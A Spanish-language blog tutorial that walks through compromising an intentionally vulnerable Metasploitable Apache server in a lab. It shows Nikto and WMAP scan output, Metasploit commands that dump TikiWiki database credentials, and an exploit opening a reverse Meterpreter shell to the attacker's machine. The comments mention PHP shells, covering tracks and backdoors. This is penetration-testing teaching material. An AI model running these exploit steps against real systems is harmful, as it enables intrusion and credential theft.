CONCEPTOS BASICOS DE PENETRACION BAJO PLATAFORMA GNU/LINUX(VULNERABLE) USANDO METASPLOIT FRAMEWORK – PARTE VI
Atacando un Servidor Apache Vulnerable
Encontrando Vulnerabilidades sobre el servicio Apache (Puerto 80)
Anteriormente se ha indicado el uso de Nikto para auditar y encontrar vulnerabilidades en un servidor web, en este caso, es posible utilizarlo para dictaminar que posibles vulnerabilidades pueden ser aprovechadas por un atacante para romper en la seguridad del servidor, para conocer mas detalles sobre el uso de Nikto, ver aquí
>nikto.pl -h 192.168.1.34:80 – Nikto v2.1.4————————————————————————— + Target IP: 192.168.1.34+ Target Hostname: 192.168.1.34+ Target Port: 80+ Start Time: 2011-05-21 23:08:10 ————————————————————————— + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch + Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Number of sections in the version string differ from those in the database, the server reports: php/5.2.4-2ubuntu5.10 while the database has: 5.3.5. This may cause false positives. + PHP/5.2.4-2ubuntu5.10 appears to be outdated (current is at least 5.3.5) + ETag header found on server, inode: 67575, size: 45, mtime: 0x481ffa5ca8840 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10 + OSVDB-3233: /phpinfo.php: Contains PHP configuration information + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-40478: /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://cirt.net/rfiinc.txt?: TikiWiki contains a vulnerability which allows remote attackers to execute arbitrary PHP code. + 6448 items checked: 2 error(s) and 11 item(s) reported on remote host + End Time: 2011-05-21 23:09:09 (59 seconds) ————————————————————————— + 1 host(s) tested |
Por otro lado también es posible utilizar el plugin WMAP de metasploit que también realiza un escaneo de la estructura del servidor y dictamina posibles vulnerabilidades que pueden ser directamente ejecutadas desde metasploit.
msf > wmap_targets -t 192.168.1.34 msf > wmap_run -t [*] Testing target: [*] Site: 192.168.1.34 (192.168.1.34)[*] Port: 80 SSL: false ============================================================ [*] Testing started. Fri May 20 23:20:19 +0200 2011 =[ SSL testing ]= ============================================================ [*] Target is not SSL. SSL modules disabled. =[ Web Server testing ]= ============================================================ [*] Loaded auxiliary/scanner/http/options … [*] Loaded auxiliary/scanner/http/frontpage_login … [*] Loaded auxiliary/scanner/http/svn_scanner … [*] Loaded auxiliary/scanner/http/robots_txt … [*] Loaded auxiliary/scanner/http/vhost_scanner … [*] Loaded auxiliary/scanner/http/http_version … [*] Loaded auxiliary/scanner/http/open_proxy … [*] Loaded auxiliary/admin/http/tomcat_administration … [*] Loaded auxiliary/admin/http/tomcat_utf8_traversal … [*] Loaded auxiliary/scanner/http/webdav_website_content … [*] Loaded auxiliary/scanner/http/webdav_internal_ip … [*] Loaded auxiliary/scanner/http/verb_auth_bypass … [*] Loaded auxiliary/scanner/http/web_vulndb … [*] Loaded auxiliary/scanner/http/webdav_scanner … [*] Loaded auxiliary/admin/http/contentkeeper_fileaccess … =[ File/Dir testing ]= ============================================================ [*] Loaded auxiliary/scanner/http/prev_dir_same_name_file … [*] Loaded auxiliary/scanner/http/dir_scanner … [*] Loaded auxiliary/scanner/http/copy_of_file … [*] Loaded auxiliary/scanner/http/dir_webdav_unicode_bypass … [*] Loaded auxiliary/scanner/http/backup_file … [*] Loaded auxiliary/scanner/http/replace_ext … [*] Loaded auxiliary/scanner/http/ms09_020_webdav_unicode_bypass … [*] Loaded auxiliary/scanner/http/trace_axd … [*] Loaded auxiliary/scanner/http/file_same_name_dir … [*] Loaded auxiliary/scanner/http/writable … [*] Loaded auxiliary/scanner/http/files_dir … [*] Loaded auxiliary/scanner/http/dir_listing … [*] Loaded auxiliary/scanner/http/brute_dirs … =[ Unique Query testing ]= ============================================================ [*] Loaded auxiliary/scanner/http/error_sql_injection … [*] Loaded auxiliary/scanner/http/blind_sql_query … =[ Query testing ]= ============================================================ =[ General testing ]= ============================================================ [*] Analysis completed in 11.3877420425415 seconds. [*] Done. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ msf > db_vulns [*] Time: Fri May 20 22:29:14 UTC 2011 Vuln: host=192.168.1.34 name=exploit/unix/webapp/tikiwiki_graph_formula_exec refs=CVE-2007-5423,OSVDB-40478,BID-26006 |
Después de analizar la salida de Nikto y el plugin de metasploit WMAP, se puede ver que se han detectado algunas vulnerabilidades que pueden ser una posible brecha de seguridad que un atacante podría aprovechar.
Tomando esta información como punto de entrada se procede a intentar comprometer el servidor web apache de la maquina remota, para este fin se realizan los siguientes pasos:
- La vulnerabilidad detectada por WMAP es exactamente igual a la detectada por Nikto, por lo tanto se profundizará sobre esta.
- Por otro lado Nikto ha proporcionado datos valiosos sobre información general del servidor, como métodos HTTP aceptados y el fichero por defecto phpinfo.php para obtener información sobre la configuración de PHP en el servidor, sin embargo, existe una vulnerabilidad que parece aun mas prometedora relacionada con tikiwiki
msf > search tikiwiki
[*] Searching loaded modules for pattern ‘tikiwiki’…
Auxiliary=========
Name Disclosure Date Rank Description—- ————— —- ———–admin/tikiwiki/tikidblib 2006-11-01 normal TikiWiki information disclosureExploits
========
Name Disclosure Date Rank Description
—- ————— —- ———–
unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent TikiWiki tiki-graph_formula Remote PHP Code Execution
unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent TikiWiki jhot Remote Command Execution
- Aparecen algunos exploits y módulos auxiliares que posiblemente pueden explotar esta vulnerabilidad, después de probarlos todos, los resultados han sido los siguientes:
msf > use auxiliary/admin/tikiwiki/tikidblib
msf auxiliary(tikidblib) > show options
Module options (auxiliary/admin/tikiwiki/tikidblib):
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chainRHOST yes The target addressRPORT 80 yes The target port
URI /tikiwiki yes TikiWiki directory path
VHOST no HTTP server virtual host
msf auxiliary(tikidblib) > set RHOST 192.168.1.34
RHOST => 192.168.1.34
msf auxiliary(tikidblib) > run
[*] Establishing a connection to the target…
[*] Get informations about database…
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type : mysql
[*] DB name : tikiwiki195
[*] DB host : localhost
[*] DB user : root
[*] DB password : root
[*] Auxiliary module execution completed
- Con la ejecución del modulo auxiliar anteriormente indicado se han obtenido fácilmente las credenciales
msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec msf exploit(tikiwiki_graph_formula_exec) > show options Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec): Name Current Setting Required Description —- ————— ——– ———– Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port URI /tikiwiki yes TikiWiki directory path VHOST no HTTP server virtual host Exploit target: Id Name — —- 0 Automatic msf exploit(tikiwiki_graph_formula_exec) > set RHOST 192.168.1.34 RHOST => 192.168.1.34 msf exploit(tikiwiki_graph_formula_exec) > exploit [*] Started reverse handler on 192.168.1.33:4444 [*] Attempting to obtain database credentials… [*] The server returned : 200 OK [*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch [*] TikiWiki database informations : db_tiki : mysql dbversion : 1.9 host_tiki : localhost user_tiki : root pass_tiki : root dbs_tiki : tikiwiki195 [*] Attempting to execute our payload… [*] Sending stage (32145 bytes) to 192.168.1.34 [*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.34:51450) at Sat May 21 00:29:14 +0200 2011 meterpreter > sysinfo OS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 Computer : metasploitable Meterpreter : php/php |
ola amigo me interesa mucho este post, comunicate
Me gustaMe gusta
es bueno, pero de ahi debes escalar privilegios o subir una shell de php 🙂
Me gustaMe gusta
En el caso de Metasploitable, no es necesario escalar privilegios para la vulnerabilidad de tikiwiki, ya que el servidor web se esta ejecutando con privilegios de Root. En el caso de que sea otro servidor web vulnerable, dependerá nuevamente del usuario que se este usando para mantener el proceso activo, si es Root, no es necesario hacer ningun proceso de escalación (pero si otros pasos como cubrir trazas, limpiar rastros y crear puertas de acceso).
Me gustaMe gusta